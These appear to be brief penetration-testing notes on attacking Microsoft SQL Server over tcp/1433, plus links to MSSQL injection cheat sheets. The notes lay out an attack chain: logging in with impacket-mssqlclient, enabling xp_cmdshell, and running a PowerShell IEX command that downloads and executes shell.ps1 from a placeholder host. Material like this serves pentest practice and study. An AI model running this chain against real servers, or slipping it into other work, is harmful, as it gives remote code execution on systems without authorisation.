Notes - Attack by ports/protocols: MSSQL tcp:1433
tcp/1433 mssql
> impacket-mssqlclient <user>:<pass>@<ip>
> enable_xp_cmdshell
> xp_cmdshell powershell.exe IEX (New-Object Net.WebClient).DownloadString(\"http://<ip>/shell.ps1\");
error-based injeciton
- https://www.exploit-db.com/papers/12975
- https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/